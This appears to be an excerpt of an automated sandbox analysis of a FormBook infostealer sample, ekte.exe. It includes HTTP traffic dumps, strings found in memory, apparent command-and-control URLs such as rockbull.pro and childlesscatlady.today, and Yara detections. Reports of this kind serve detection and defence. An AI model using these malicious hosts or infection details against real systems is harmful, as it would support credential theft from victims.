fb 29 d7 55 41 97 89 5e d0 0a ef c8 d1 98 c9 2c 0b d0 33 00 d3 6c 46 36 15 ac 86 36 0f 9c 35 1b 71 a9 d6 60 74 c4 b4 8e a6 52 1a 6d 14 ad 42 a6 35 6e ad bd 25 83 a2 6b ab fb ff 20 22 17 45 c8 a8 92 b5 86 22 2c b9 f8 16 5a 29 64 b4 2e cc 9f 20 b1 af 7a eb 93 8e 92 da 2a 64 29 be 98 27 43 9b af 0f fe b4 c6 f9 b9 90 53 5a 20 cd 0d 20 43 73 e4 e5 86 e6 e1 9d 26 28 40 3f 3b 57 a2 97 82 16 4b c3 99 3e c8 0b aa 97 82 35 d9 b1 09 82 c5 62 d1 86 80 a1 79 49 05 cd 41 b9 40 b0 74 a3 3b fd 82 a7 c9 a7 97 c1 e9 c5 e5 d9 e5 e9 f9 e9 30 38 3d c8 8a 6e 8a 58 e7 2d b8 48 e5 22 4c a9 a1 6f e9 12 14 4a 0e 41 5f be a0 9b db f1 43 50 64 b5 60 86 4b 81 2c 57 8f ac 1e ce 86 55 ad 67 1e 55 79 5d 82 30 9a 8c d7 0f 67 1c ea e0 4e 0f 7c 24 60 81 5e 53 03 1e 21 e3 93 3d 04 26 45 c6 f3 81 8f 06 bb 6a 0c 48 c3 7e 9b e2 ee 60 53 81 5d 91 1d 34 a5 6b f0 50 62 07 07 a5 6b 60 6b 73 13 ac d6 b1 83 54 e8 a0 52 90 81 61 b3 41 e3 da 41 14 a9 b6 a2 85 95 92 5f 77 e2 b1 d4 6c 4e b6 15 ae a9 12 06 ee 4d 74 47 e7 b4 81 e2 eb 93 e8 07 74 d5 bb 79 f5 fa e5 c7 97 37 e8 87 e8 a4 f5 c5 bf 17 15 94 f2 8e 7f 00 Data Ascii: a71n88-Nvnfzb:J}AJe;3
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/8.1.29expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://rockbull.pro/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Mon, 21 Oct 2024 11:15:41 GMTserver: LiteSpeedData Raw: 61 37 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 bc 19 db 6e db 38 f6 b9 f9 0a 9a 0f b6 38 d5 2d 4e 93 14 76 94 6e a7 ed 0c 66 d1 d9 0e 7a c1 62 11 07 0b 9a 3a 92 99 4a a4 96 a4 ec 18 ae ff 7d 41 4a 8e 65 3b 33 db d9 8e 1b 04 88 78 78 78 ee 37 32 57 bd d7 ef 5e 7d fc d7 6f 6f d0 cc 94 c5 f5 c9 95 fd 83 0a 2a f2 04 83 c0 d7 27 27 57 33 a0 e9 f5 09 42 08 5d 95 60 28 62 33 aa 34 98 04 7f fa f8 53 f0 1c a3 a8 bb 29 68 09 09 9e 73 58 54 52 19 8c 98 14 06 84 49 f0 82 a7 66 96 a4 30 e7 0c 02 b7 f0 11 17 dc 70 5a 04 9a d1 02 92 d3 30 de 23 56 29 59 81 32 cb 04 cb 7c c4 4b 9a 43 87 60 b4 a8 82 96 7a 54 57 85 a4 a9 8e 86 f1 70 18 c5 e7 d1 4c 96 50 d1 1c 02 2b 3b a8 80 97 79 58 89 1c 1f 4a aa e4 54 1a dd 21 2b 24 17 29 dc fb 48 c8 4c 16 85 5c e0 8d 7e 86 9b 02 ae df 4b f6 79 5a 17 05 0a d0 bb 2c e3 8c d3 e2 2a 6a b6 1a 1b f5 82 00 65 52 98 80 2e 40 cb 12 10 0a 82 96 af 66 8a 57 06 69 c5 12 1c 86 51 f3 fb 99 9b d0 e2 b7 e8 21 93 65 34 4d d9 f3 67 10 5f 9e 4e c3 3b 2b 9c 92 5a 4b c5 73 2e 12 4c 85 14 cb 52 d6 1a 5f 5f 45 0d c5 96 fc ae 80 bb 52 15 5c 7c 46 0a 8a 04 eb 99 54 86 d5 06 71 26 05 46 33 05 59 82 ff c8 98 19 9d 5b 54 67 40 64 96 15 24 d8 f9 22 ba 0f 1a 12 1b 03 59 cd 93 ee 8f b3 83 de 83 3d 58 c3 8a e4 4c 66 43 cb fe 34 a2 cc 8c a9 f4 28 8a ac 4d 74 98 4b 99 17 40 2b ae 9d 61 98 d6 c3 17 19 2d 79 b1 4c 7e 11 06 d4 68 91 cf cc df 9e c5 f1 f8 3c 8e c7 17 71 3c be 8c e3 3e 2d ab 71 8b f5 9b ac 2a 2e 74 83 67 71 36 fb 29 d7 55 41 97 89 5e d0 0a ef c8 d1 98 c9 2c 0b d0 33 00 d3 6c 46 36 15 ac 86 36 0f 9c 35 1b 71 a9 d6 60 74 c4 b4 8e a6 52 1a 6d 14 ad 42 a6 35 6e ad bd 25 83 a2 6b ab fb ff 20 22 17 45 c8 a8 92 b5 86 22 2c b9 f8 16 5a 29 64 b4 2e cc 9f 20 b1 af 7a eb 93 8e 92 da 2a 64 29 be 98 27 43 9b af 0f fe b4 c6 f9 b9 90 53 5a 20 cd 0d 20 43 73 e4 e5 86 e6 e1 9d 26 28 40 3f 3b 57 a2 97 82 16 4b c3 99 3e c8 0b aa 97 82 35 d9 b1 09 82 c5 62 d1 86 80 a1 79 49 05 cd 41 b9 40 b0 74 a3 3b fd 82 a7 c9 a7 97 c1 e9 c5 e5 d9 e5 e9 f9 e9 30 38 3d c8 8a 6e 8a 58 e7 2d b8 48 e5 22 4c a9 a1 6f e9 12 14 4a 0e 41 5f be a0 9b db f1 43 50 64 b5 60 86 4b 81 2c 57 8f ac 1e ce 86 55 ad 67 1e 55 79 5d 82 30 9a 8c d7 0f 67 1c ea e0 4e 0f 7c 24 60 81 5e 53 03 1e 21 e3 93 3d 04 26 45 c6 f3 81 8f 06 bb 6a 0c 48 c3 7e 9b e2 ee 60 53 81 5d 91 1d 34 a5 6b f0 50 62 07 07 a5 6b 60 6b 73 13 ac d6 b1 83 54 e8 a0 52 90 81 61 b3 41 e3 da 41 14 a9 b6 a2 85 95 92 5f 77 e2 b1 d4 6c 4e b6 15 ae a9 12 06 ee 4d 74 47 e7 b4 81 e2 eb 93 e8 07 74 d5 bb 79 f5 fa e5 c7 97 37 e8 87 e8 a4 f5 c5 bf 17 15 94 f2 8e 7f 00 Data Ascii: a71n88-Nvnfzb:J}AJe;3
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 21 Oct 2024 11:15:58 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 21 Oct 2024 11:16:00 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 21 Oct 2024 11:16:03 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 21 Oct 2024 11:16:07 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 21 Oct 2024 11:16:26 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66ad66a8-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 21 Oct 2024 11:16:28 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66ad66a8-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 21 Oct 2024 11:16:31 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66ad66a8-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 21 Oct 2024 11:16:34 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66ad66a8-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: ekte.exe, 00000000.00000002.375617011.000000000075D000.00000004.00000020.00020000.00000000.sdmp, eFDiSxeTfjUqTk.exe, 0000000A.00000002.409649909.00000000004EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: eFDiSxeTfjUqTk.exe, 0000000A.00000002.409649909.00000000004EE000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000013.00000002.627150947.00000000029DC000.00000004.10000000.00040000.00000000.sdmp, BuhvZTwGQCD.exe, 00000014.00000002.626948129.0000000002BAC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.476232018.000000000150C000.00000004.80000000.00040000.00000000.sdmp, ekte.exe, eFDiSxeTfjUqTk.exe.0.dr String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: ekte.exe, eFDiSxeTfjUqTk.exe.0.dr String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: ekte.exe, 00000000.00000002.375617011.000000000075D000.00000004.00000020.00020000.00000000.sdmp, eFDiSxeTfjUqTk.exe, 0000000A.00000002.409649909.00000000004EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: ekte.exe, 00000000.00000002.375617011.000000000075D000.00000004.00000020.00020000.00000000.sdmp, eFDiSxeTfjUqTk.exe, 0000000A.00000002.409649909.00000000004EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: ekte.exe, 00000000.00000002.375617011.000000000075D000.00000004.00000020.00020000.00000000.sdmp, eFDiSxeTfjUqTk.exe, 0000000A.00000002.409649909.00000000004EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: ekte.exe, 00000000.00000002.375617011.000000000075D000.00000004.00000020.00020000.00000000.sdmp, eFDiSxeTfjUqTk.exe, 0000000A.00000002.409649909.00000000004EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: ekte.exe, 00000000.00000002.375617011.000000000075D000.00000004.00000020.00020000.00000000.sdmp, eFDiSxeTfjUqTk.exe, 0000000A.00000002.409649909.00000000004EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: ekte.exe, 00000000.00000002.375617011.000000000075D000.00000004.00000020.00020000.00000000.sdmp, eFDiSxeTfjUqTk.exe, 0000000A.00000002.409649909.00000000004EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: ekte.exe, eFDiSxeTfjUqTk.exe.0.dr String found in binary or memory: http://ocsp.comodoca.com0
Source: ekte.exe, 00000000.00000002.375617011.000000000075D000.00000004.00000020.00020000.00000000.sdmp, eFDiSxeTfjUqTk.exe, 0000000A.00000002.409649909.00000000004EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0%
Source: ekte.exe, 00000000.00000002.375617011.000000000075D000.00000004.00000020.00020000.00000000.sdmp, eFDiSxeTfjUqTk.exe, 0000000A.00000002.409649909.00000000004EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0-
Source: ekte.exe, 00000000.00000002.375617011.000000000075D000.00000004.00000020.00020000.00000000.sdmp, eFDiSxeTfjUqTk.exe, 0000000A.00000002.409649909.00000000004EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0/
Source: ekte.exe, 00000000.00000002.375617011.000000000075D000.00000004.00000020.00020000.00000000.sdmp, eFDiSxeTfjUqTk.exe, 0000000A.00000002.409649909.00000000004EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com05
Source: ekte.exe, 00000000.00000002.375617011.000000000075D000.00000004.00000020.00020000.00000000.sdmp, eFDiSxeTfjUqTk.exe, 0000000A.00000002.409649909.00000000004EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.entrust.net03
Source: ekte.exe, 00000000.00000002.375617011.000000000075D000.00000004.00000020.00020000.00000000.sdmp, eFDiSxeTfjUqTk.exe, 0000000A.00000002.409649909.00000000004EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.entrust.net0D
Source: findstr.exe, 00000013.00000002.627150947.0000000002F56000.00000004.10000000.00040000.00000000.sdmp, BuhvZTwGQCD.exe, 00000014.00000002.626948129.0000000003126000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://rockbull.pro/0804/?o0I8bJWh=7cQ5BE5RBCqgXF7xrBGoHohDXivjQLfe2KgDJ9LuiE6tpBU04a3sAbwq5Q7Yjj3Jj
Source: ekte.exe, 00000000.00000002.376498845.000000000290A000.00000004.00000800.00020000.00000000.sdmp, eFDiSxeTfjUqTk.exe, 0000000A.00000002.409956396.00000000023BE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: BuhvZTwGQCD.exe, 00000014.00000002.626793041.0000000000654000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.childlesscatlady.today
Source: BuhvZTwGQCD.exe, 00000014.00000002.626793041.0000000000654000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.childlesscatlady.today/0l08/
Source: ekte.exe, 00000000.00000002.375617011.000000000075D000.00000004.00000020.00020000.00000000.sdmp, eFDiSxeTfjUqTk.exe, 0000000A.00000002.409649909.00000000004EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: ekte.exe, 00000000.00000002.375617011.000000000075D000.00000004.00000020.00020000.00000000.sdmp, eFDiSxeTfjUqTk.exe, 0000000A.00000002.409649909.00000000004EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: findstr.exe, 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmp, sqlite3.dll.19.dr String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: findstr.exe, 00000013.00000003.464119526.0000000005F9A000.00000004.00000020.00020000.00000000.sdmp, 6z95F416.19.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: findstr.exe, 00000013.00000003.464119526.0000000005F9A000.00000004.00000020.00020000.00000000.sdmp, 6z95F416.19.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: findstr.exe, 00000013.00000003.464119526.0000000005F9A000.00000004.00000020.00020000.00000000.sdmp, 6z95F416.19.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: findstr.exe, 00000013.00000003.464119526.0000000005F9A000.00000004.00000020.00020000.00000000.sdmp, 6z95F416.19.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: findstr.exe, 00000013.00000003.464119526.0000000005F9A000.00000004.00000020.00020000.00000000.sdmp, 6z95F416.19.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: findstr.exe, 00000013.00000003.464119526.0000000005F9A000.00000004.00000020.00020000.00000000.sdmp, 6z95F416.19.dr String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: findstr.exe, 00000013.00000003.464119526.0000000005F9A000.00000004.00000020.00020000.00000000.sdmp, 6z95F416.19.dr String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: ekte.exe, 00000000.00000002.375617011.000000000075D000.00000004.00000020.00020000.00000000.sdmp, eFDiSxeTfjUqTk.exe, 0000000A.00000002.409649909.00000000004EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://secure.comodo.com/CPS0
Source: findstr.exe, 00000013.00000002.627150947.00000000029DC000.00000004.10000000.00040000.00000000.sdmp, BuhvZTwGQCD.exe, 00000014.00000002.626948129.0000000002BAC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.476232018.000000000150C000.00000004.80000000.00040000.00000000.sdmp, ekte.exe, eFDiSxeTfjUqTk.exe.0.dr String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
Source: 6z95F416.19.dr String found in binary or memory: https://www.google.com/favicon.ico

E-Banking Fraud
barindex
Yara detected FormBook
Source: Yara match File source: 8.2.ekte.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.ekte.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000013.00000002.626531753.00000000000E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.417743791.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.416525445.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.476152152.0000000000210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.626483718.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.626793041.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.626660475.0000000000220000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.626744301.0000000002980000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.419884828.0000000001490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 8.2.ekte.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
